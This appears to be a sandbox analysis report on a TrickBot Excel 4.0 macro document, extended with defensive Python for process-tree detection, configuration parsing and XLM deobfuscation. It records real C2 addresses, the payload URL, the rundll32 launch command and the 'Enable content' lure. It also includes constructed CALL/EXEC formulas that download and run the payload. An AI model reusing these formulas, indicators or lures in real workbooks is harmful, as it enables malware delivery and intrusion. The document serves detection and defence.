
Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1

Detection

Hidden Macro 4.0 TrickBot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6276 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6624 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 6676 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)
  • cleanup
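The tree above (EXCEL.EXE starting rundll32.exe on a file that is not a .dll, rundll32.exe then starting wermgr.exe) is the detection opportunity in this report. The following is an added example, not Joe Sandbox code: it re-creates the three process-creation events from the Startup section (PIDs, image paths and command lines are the report's; parent PIDs follow the tree's nesting; EXCEL.EXE's own parent is unknown and set to 0) and runs four process-creation rules over them. The OFFICE_APPS, LOLBINS and WER_PARENTS sets are assumptions of the example and should be tuned to the environment.

```python
r"""Process-creation rules for the tree the report shows
(EXCEL.EXE -> rundll32.exe <non-.dll module>,StartW -> wermgr.exe).
Added example, not Joe Sandbox code. EVENTS is constructed from the report's
Startup section: PIDs, images and command lines are the report's, parent PIDs
follow the tree's nesting, and EXCEL.EXE's own parent (unknown) is set to 0."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


EVENTS = [
    ProcEvent(6276, 0, r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
              r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"),
    ProcEvent(6624, 6276, r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32 ..\fdinmd.fii,StartW"),
    ProcEvent(6676, 6624, r"C:\Windows\System32\wermgr.exe",
              r"C:\Windows\system32\wermgr.exe"),
]

# Assumed lists for the rules (tune to the environment).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe"}
# wermgr.exe is normally started by the Windows Error Reporting service host
# (svchost.exe) or by WerFault.exe; any other parent is worth a look (assumption).
WER_PARENTS = {"svchost.exe", "werfault.exe"}

# rundll32 takes '<module>,<entry>' as its first argument.
_RUNDLL32_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+("[^"]+"|\S+?)\s*,\s*(\S+)',
    re.IGNORECASE)
_ABSOLUTE_WIN_PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_rundll32(cmdline):
    """Split 'rundll32 <module>,<entry>' into (module, entry); None if not that shape."""
    m = _RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    return m.group(1).strip('"'), m.group(2)


def evaluate(events):
    """Run the rules over a list of ProcEvent and return (rule, pid, detail) tuples."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        cimg = basename(e.image)
        # Rule 1: an Office application launching a living-off-the-land binary.
        if pimg in OFFICE_APPS and cimg in LOLBINS:
            alerts.append(("office_spawns_lolbin", e.pid, f"{pimg} -> {cimg} ({e.cmdline})"))
        # Rules 2 and 3: rundll32 loading a module that is not a .dll, or one given
        # by a relative path (both true of '..\fdinmd.fii,StartW'). A module with no
        # extension gets '.dll' appended by the loader, so it is treated as a .dll.
        if cimg == "rundll32.exe":
            parsed = parse_rundll32(e.cmdline)
            if parsed:
                module, entry = parsed
                name = basename(module)
                ext = name.rpartition(".")[2] if "." in name else "dll"
                if ext != "dll":
                    alerts.append(("rundll32_non_dll_module", e.pid, f"{module},{entry}"))
                if not _ABSOLUTE_WIN_PATH_RE.match(module):
                    alerts.append(("rundll32_relative_module_path", e.pid, module))
        # Rule 4: wermgr.exe with a parent other than the WER service host.
        if cimg == "wermgr.exe" and pimg not in WER_PARENTS:
            alerts.append(("wermgr_unexpected_parent", e.pid, f"{pimg} -> {cimg}"))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in evaluate(EVENTS):
        print(f"{rule:32} pid={pid} {detail}")
```

Run against the three events this yields one alert for the Excel-to-rundll32 launch, two for the rundll32 command line (non-.dll module and relative path) and one for wermgr.exe being parented by rundll32.exe. The same four conditions translate directly into a Sysmon Event ID 1 or Windows Security 4688 rule; the report's Sigma section shows that none of the rules it ran covered them.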

Malware Configuration

Threatname: Trickbot

{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
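The extracted configuration is the most directly actionable part of the report, but not every entry in it is usable. The following added example (not the sandbox's extractor) takes the JSON above verbatim, splits the server list into routable and unroutable entries, builds a blocklist from the routable ones, and decodes the ecc_key field as a Windows CNG BCRYPT_ECCKEY_BLOB (magic, 4-byte little-endian key length, then X and Y coordinates; the magic values are the BCRYPT_ECDSA_PUBLIC_P*_MAGIC constants from bcrypt.h). Public reporting on TrickBot describes this key as the bot's signature-verification key; the example only checks that the blob is structurally a public key and does not validate the curve point.

```python
"""Turn the TrickBot configuration the sandbox extracted from rundll32's memory
into checkable indicators. Added example, not the sandbox's extractor code.
CONFIG is the JSON from the report's Malware Configuration section, verbatim."""
import base64
import ipaddress
import json
import struct
from collections import Counter

CONFIG = r'''{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}'''

# CNG public-key blob magics from bcrypt.h (BCRYPT_ECDSA_PUBLIC_P*_MAGIC) as they
# appear in little-endian byte order at the start of a BCRYPT_ECCKEY_BLOB,
# with the coordinate size in bytes for each curve.
ECDSA_PUBLIC_MAGICS = {
    b"ECS1": ("ECDSA P-256", 32),
    b"ECS3": ("ECDSA P-384", 48),
    b"ECS5": ("ECDSA P-521", 66),
}


def parse_config(config_json):
    return json.loads(config_json)


def parse_servers(config_json):
    """Return [(ip, port), ...] for every 'servs' entry, preserving order."""
    servers = []
    for entry in parse_config(config_json)["servs"]:
        host, _, port = entry.rpartition(":")
        servers.append((host, int(port)))
    return servers


def unroutable_servers(servers):
    """Entries outside globally routable space (reserved 240.0.0.0/4, private
    ranges, etc.). They can never be reached, so they are filler: keep them off
    blocklists and out of 'seen C2' correlation, where they only add noise."""
    out = []
    for ip, port in servers:
        addr = ipaddress.ip_address(ip)
        if addr.is_reserved or addr.is_private or not addr.is_global:
            out.append((ip, port))
    return out


def port_histogram(servers):
    """TrickBot configs mix the well-known 443/449 with random high ports; the
    histogram shows how much of the list sits on each."""
    return Counter(port for _, port in servers)


def blocklist(servers):
    """Sorted, de-duplicated 'ip:port' strings for the routable servers only."""
    bad = set(unroutable_servers(servers))
    return sorted(f"{ip}:{port}" for ip, port in servers if (ip, port) not in bad)


def parse_ecc_key(b64):
    """Decode 'ecc_key' as a Windows CNG BCRYPT_ECCKEY_BLOB:
    4-byte magic, 4-byte little-endian cbKey, then X and Y of cbKey bytes each."""
    blob = base64.b64decode(b64)
    if len(blob) < 8:
        return {"well_formed": False, "reason": "shorter than the 8-byte header"}
    magic, cb_key = struct.unpack_from("<4sI", blob, 0)
    curve, expected_len = ECDSA_PUBLIC_MAGICS.get(magic, ("unknown", None))
    return {
        "magic": magic.decode("ascii", "replace"),
        "curve": curve,
        "key_len": cb_key,
        "blob_len": len(blob),
        # A public blob carries exactly X||Y after the header, and cbKey must
        # match the coordinate size of the curve the magic names.
        "well_formed": cb_key == expected_len and len(blob) == 8 + 2 * cb_key,
    }


if __name__ == "__main__":
    cfg = parse_config(CONFIG)
    servers = parse_servers(CONFIG)
    print(f"ver={cfg['ver']} gtag={cfg['gtag']} autorun={cfg['autorun']} servers={len(servers)}")
    print("unroutable:", unroutable_servers(servers))
    print("ports:", port_histogram(servers).most_common(3))
    print("blocklist entries:", len(blocklist(servers)))
    print("key:", parse_ecc_key(cfg["ecc_key"]))
```

Two of the 29 servers (250.16.62.7 and 245.241.127.55) lie in the reserved 240.0.0.0/4 block and can never be contacted; the remaining 27 are the entries worth blocking or hunting for, with port 449 (five entries) being the TrickBot-specific one. The key blob decodes to magic ECS3 with cbKey 48 and a total length of 104 bytes, i.e. a well-formed P-384 public key.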

Yara Overview

Initial Sample

Source: 446446.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x165db:$e1: Enable Editing
  • 0x16325:$e3: Enable editing
  • 0x163f7:$e4: Enable content

Memory Dumps

Rule: JoeSecurity_TrickBot_4 (Yara detected Trickbot, author: Joe Security), matched in:
  • 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp
  • 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp
  • 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp

Unpacked PEs

Rule: JoeSecurity_TrickBot_4 (Yara detected Trickbot, author: Joe Security), matched in:
  • 1.2.rundll32.exe.4030000.3.unpack
  • 1.2.rundll32.exe.3fb0000.2.raw.unpack
  • 1.2.rundll32.exe.4030000.3.raw.unpack

All matching memory dumps and unpacked images belong to process 1, rundll32.exe (PID 6624): the TrickBot payload is unpacked in memory only after rundll32 loads fdinmd.fii, which is why the Yara hits are on rundll32's memory regions at 0x3FB0000, 0x4030000 and 0x4070000 and not on the dropped file.

Sigma Overview

No Sigma rule has matched. This says something about the rule set that was run, not about the behaviour: the process chain recorded under Startup (EXCEL.EXE starting rundll32.exe on a file that is not a .dll, rundll32.exe then starting wermgr.exe) is exactly what process-creation rules are written for.

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp (rundll32.exe memory), Malware Configuration Extractor: Trickbot, configuration as listed under Malware Configuration above
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: SQCTO[1].perclick.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic, DNS query: name: clientconfig.passport.net
Source: global traffic, TCP traffic: 192.168.2.3:49714 -> 64.207.186.30:80 (the report lists this connection twice)
Source: global traffic, HTTP traffic detected (the report lists this request twice):
  GET /blogs/click.php HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: living-traditions.com
  Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: clientconfig.passport.net
Source: 446446.xls, 90A10000.0.dr, String found in binary or memory: http://living-traditions.com/blogs/click.php

Read together: the payload URL is present in the sample itself (and in 90A10000.0.dr, a file Excel wrote), the request to living-traditions.com (64.207.186.30) goes over plain HTTP on port 80, and the User-Agent is the WinINet/urlmon default for a 32-bit process on 64-bit Windows 10 (the MSIE 7.0 compatible string with WOW64), which is what URLDownloadToFileA sends from Excel; no browser was involved. The clientconfig.passport.net lookup is a Microsoft account (Passport) configuration endpoint that Office contacts on its own and is not attacker traffic.
Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr (a file written by EXCEL.EXE, process 0), strings found in binary or memory. All of these are standard endpoints that Office itself references (Microsoft services and Office's feedback forums), not infrastructure used by the sample; they are kept here for completeness:
  • http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
  • http://weather.service.msn.com/data.aspx
  • https://addinsinstallation.store.office.com/appinstall/preinstalled
  • https://addinslicensing.store.office.com/commerce/query
  • https://analysis.windows.net/powerbi/api
  • https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://api.aadrm.com/
  • https://api.addins.omex.office.net/appinfo/query
  • https://api.addins.omex.office.net/appstate/query
  • https://api.addins.store.office.com/app/query
  • https://api.cortana.ai
  • https://api.diagnostics.office.com
  • https://api.diagnosticssdf.office.com
  • https://api.microsoftstream.com/api/
  • https://api.office.net
  • https://api.onedrive.com
  • https://api.powerbi.com/beta/myorg/imports
  • https://api.powerbi.com/v1.0/myorg/datasets
  • https://api.powerbi.com/v1.0/myorg/groups
  • https://apis.live.net/v5.0/
  • https://arc.msn.com/v4/api/selection
  • https://asgsmsproxyapi.azurewebsites.net/
  • https://augloop.office.com
  • https://augloop.office.com/v2
  • https://autodiscover-s.outlook.com/
  • https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  • https://cdn.entity.
  • https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  • https://client-office365-tas.msedge.net/ab
  • https://clients.config.office.net/
  • https://clients.config.office.net/user/v1.0/android/policies
  • https://clients.config.office.net/user/v1.0/ios
  • https://clients.config.office.net/user/v1.0/mac
  • https://clients.config.office.net/user/v1.0/tenantassociationkey
  • https://cloudfiles.onenote.com/upload.aspx
  • https://config.edge.skype.com
  • https://config.edge.skype.com/config/v1/Office
  • https://config.edge.skype.com/config/v2/Office
  • https://cortana.ai
  • https://cortana.ai/api
  • https://cr.office.com
  • https://dataservice.o365filtering.com
  • https://dataservice.o365filtering.com/
  • https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  • https://dev.cortana.ai
  • https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  • https://dev0-api.acompli.net/autodetect
  • https://devnull.onenote.com
  • https://directory.services.
  • https://ecs.office.com/config/v2/Office
  • https://entitlement.diagnostics.office.com
  • https://entitlement.diagnosticssdf.office.com
  • https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  • https://globaldisco.crm.dynamics.com
  • https://graph.ppe.windows.net
  • https://graph.ppe.windows.net/
  • https://graph.windows.net
  • https://graph.windows.net/
  • https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  • https://hubblecontent.osi.office.net/contentsvc/browse?
  • https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  • https://incidents.diagnostics.office.com
  • https://incidents.diagnosticssdf.office.com
  • https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  • https://insertmedia.bing.office.net/odc/insertmedia
  • https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  • https://lifecycle.office.com
  • https://login.microsoftonline.com/
  • https://login.windows-ppe.net/common/oauth2/authorize
  • https://login.windows.local
  • https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  • https://login.windows.net/common/oauth2/authorize
  • https://loki.delve.office.com/api/v1/configuration/officewin32/
  • https://lookup.onenote.com/lookup/geolocation/v1
  • https://management.azure.com
  • https://management.azure.com/
  • https://messaging.office.com/
  • https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  • https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://ncus.contentsync.
  • https://ncus.pagecontentsync.
  • https://o365auditrealtimeingestion.manage.office.com
  • https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
  • https://o365diagnosticsppe-web.cloudapp.net
  • https://ocos-office365-s2s.msedge.net/ab
  • https://ofcrecsvcapi-int.azurewebsites.net/
  • https://officeapps.live.com
  • https://officeci.azurewebsites.net/api/
  • https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
  • https://officesetup.getmicrosoftkey.com
  • https://ogma.osi.office.net/TradukoApi/api/v1.0/
  • https://omex.cdn.office.net/addinclassifier/officeentities
  • https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
  • https://onedrive.live.com
  • https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
  • https://onedrive.live.com/embed?
  • https://outlook.office.com/
  • https://outlook.office.com/autosuggest/api/v1/init?cvid=
  • https://outlook.office365.com/
  • https://outlook.office365.com/api/v1.0/me/Activities
  • https://outlook.office365.com/autodiscover/autodiscover.json
  • https://ovisualuiapp.azurewebsites.net/pbiagave/
  • https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
  • https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
  • https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
  • https://portal.office.com/account/?ref=ClientMeControl
  • https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
  • https://powerlift-frontdesk.acompli.net
  • https://powerlift.acompli.net
  • https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
  • https://prod-global-autodetect.acompli.net/autodetect
  • https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
  • https://res.getmicrosoftkey.com/api/redemptionevents
  • https://rpsticket.partnerservices.getmicrosoftkey.com
  • https://settings.outlook.com
  • https://shell.suite.office.com:1443
  • https://skyapi.live.net/Activity/
  • https://sr.outlook.office.net/ws/speech/recognize/assistant/work
  • https://staging.cortana.ai
  • https://storage.live.com/clientlogs/uploadlocation
  • https://store.office.cn/addinstemplate
  • https://store.office.com/?productgroup=Outlook
  • https://store.office.com/addinstemplate
  • https://store.office.de/addinstemplate
  • https://store.officeppe.com/addinstemplate
  • https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • https://tasks.office.com
  • https://templatelogging.office.com/client/log
  • https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
  • https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
  • https://visio.uservoice.com/forums/368202-visio-on-devices
  • https://web.microsoftstream.com/video/
  • https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
  • https://webshell.suite.office.com
  • https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
  • https://wus2.contentsync.
  • https://wus2.pagecontentsync.
  • https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
  • https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8, Screenshot OCR: Enable editing" to unlock the editing document downjoaded from the Internet. Protected View This fi
Source: Screenshot number: 8, Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
Found Excel 4.0 Macro with suspicious formulas
Source: 446446.xls, Initial sample: CALL
Source: 446446.xls, Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: 446446.xls, Initial sample: High usage of CHAR() function: 39
Source: 446446.xls, Initial sample: High usage of CHAR() function: 26
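The two heuristics above (CALL/EXEC present, many CHAR() calls) describe the standard Excel 4.0 macro pattern: strings such as the API name and the command line are assembled from CHAR(n)&CHAR(n)&... so that the plaintext never appears in the sheet. The following is an added example, not Joe Sandbox code, of the de-obfuscation step an analyst applies before reading such formulas. The two formulas in SAMPLE_FORMULAS are constructed to mirror the behaviour the report records (a URLDownloadToFileA fetch of the click.php URL and the rundll32 ..\fdinmd.fii,StartW launch); the real cell contents are not reproduced in the report, so the CHAR() counts here are not the report's 39 and 26.

```python
r"""De-obfuscate CHAR()-built Excel 4.0 (XLM) formulas and surface the functions
the sandbox treats as suspicious (CALL, EXEC). Added example, not Joe Sandbox
code. SAMPLE_FORMULAS are constructed to mirror the behaviour the report
describes (an URLDownloadToFileA fetch of the click.php URL, then
'rundll32 ..\fdinmd.fii,StartW'); the actual macro sheet is not in the report."""
import re

# One string piece: a quoted XLM literal (a literal quote inside is doubled) or CHAR(n).
_PIECE = r'(?:"(?:[^"]|"")*"|CHAR\(\d{1,3}\))'
# A run of pieces joined with '&', which XLM evaluates to a single string.
_RUN_RE = re.compile(_PIECE + r'(?:\s*&\s*' + _PIECE + r')*', re.IGNORECASE)
_PIECE_RE = re.compile(r'"((?:[^"]|"")*)"|CHAR\((\d{1,3})\)', re.IGNORECASE)
_CHAR_RE = re.compile(r'CHAR\(\d{1,3}\)', re.IGNORECASE)

# XLM functions that run code, register APIs or write formulas into cells.
SUSPICIOUS_FUNCS = ("CALL", "EXEC", "REGISTER", "FORMULA", "FORMULA.FILL")
# Substrings worth surfacing once the strings are decoded (matched case-insensitively).
INDICATORS = ("URLDownloadToFileA", "rundll32", "regsvr32", "mshta", "http://", "https://")


def _eval_piece(m):
    if m.group(1) is not None:
        return m.group(1).replace('""', '"')
    return chr(int(m.group(2)))


def _collapse_run(m):
    text = "".join(_eval_piece(p) for p in _PIECE_RE.finditer(m.group(0)))
    # Re-emit as one XLM literal; a quote produced by CHAR(34) must be doubled again.
    return '"' + text.replace('"', '""') + '"'


def count_char_calls(formula):
    """How many CHAR(n) calls the formula contains (the sandbox's obfuscation heuristic)."""
    return len(_CHAR_RE.findall(formula))


def decode_char_concat(formula):
    """Replace every CHAR(n)/literal concatenation with the single literal it yields."""
    return _RUN_RE.sub(_collapse_run, formula)


def find_suspicious(decoded):
    """Suspicious XLM functions called, and indicator substrings present, in a decoded formula."""
    funcs = sorted(f for f in SUSPICIOUS_FUNCS
                   if re.search(r'(?<![\w.])' + re.escape(f) + r'\(', decoded, re.IGNORECASE))
    lowered = decoded.lower()
    inds = sorted(i for i in INDICATORS if i.lower() in lowered)
    return {"functions": funcs, "indicators": inds}


def analyze(formulas):
    """Aggregate the checks over all formulas of a macro sheet."""
    result = {"char_calls": 0, "functions": set(), "indicators": set(), "decoded": []}
    for f in formulas:
        d = decode_char_concat(f)
        s = find_suspicious(d)
        result["char_calls"] += count_char_calls(f)
        result["functions"].update(s["functions"])
        result["indicators"].update(s["indicators"])
        result["decoded"].append(d)
    result["functions"] = sorted(result["functions"])
    result["indicators"] = sorted(result["indicators"])
    return result


# Constructed formulas (not the sample's cells). The first models the
# URLDownloadToFileA call the report attributes to EXCEL.EXE, the second the
# 'Process created: rundll32 ..\fdinmd.fii,StartW' the report records.
CALL_FORMULA = (r'=CALL("urlmon",CHAR(85)&CHAR(82)&CHAR(76)&"DownloadToFileA","JJCCJJ",0,'
                r'"http://living-traditions.com/blogs/click.php","..\fdinmd.fii",0,0)')
EXEC_FORMULA = (r'=EXEC(CHAR(114)&CHAR(117)&CHAR(110)&CHAR(100)&CHAR(108)&CHAR(108)'
                r'&CHAR(51)&CHAR(50)&" ..\fdinmd.fii,StartW")')
SAMPLE_FORMULAS = [CALL_FORMULA, EXEC_FORMULA]


if __name__ == "__main__":
    summary = analyze(SAMPLE_FORMULAS)
    for line in summary["decoded"]:
        print(line)
    print(summary["char_calls"], summary["functions"], summary["indicators"])
```

To apply this to a real workbook, first dump the macro sheet's formulas with a tool that parses the BIFF records, such as olevba from oletools or XLMMacroDeobfuscator; those tools also resolve cell references and FORMULA() writes, which this example deliberately does not attempt. On the constructed input the decoder recovers the API name and the full rundll32 command line, and the aggregate view reports CALL and EXEC together with the URL, URLDownloadToFileA and rundll32 indicators.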
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\fdinmd.fii
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick
Source: 446446.xls, OLE indicator, VBA macros: true
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick, SHA256 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
Source: Joe Sandbox View, Dropped File: C:\Users\user\fdinmd.fii, SHA256 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
Both dropped files have the same SHA256: the PE fetched by URLDownloadToFileA lands in the IE cache as SQCTO[1].perclick and is written out as C:\Users\user\fdinmd.fii, the file the relative path ..\fdinmd.fii on rundll32's command line points at. Neither name carries a .dll or .exe extension, which is what the "non-matching file extension" signature refers to.
Source: 446446.xls, type: SAMPLE, Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engine, Classification label: mal96.troj.expl.evad.winXLS@5/8@2/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\{11B75B4D-A321-4A86-ACC8-8963D3D53D65} - OProcSessId.dat
Source: 446446.xls, OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
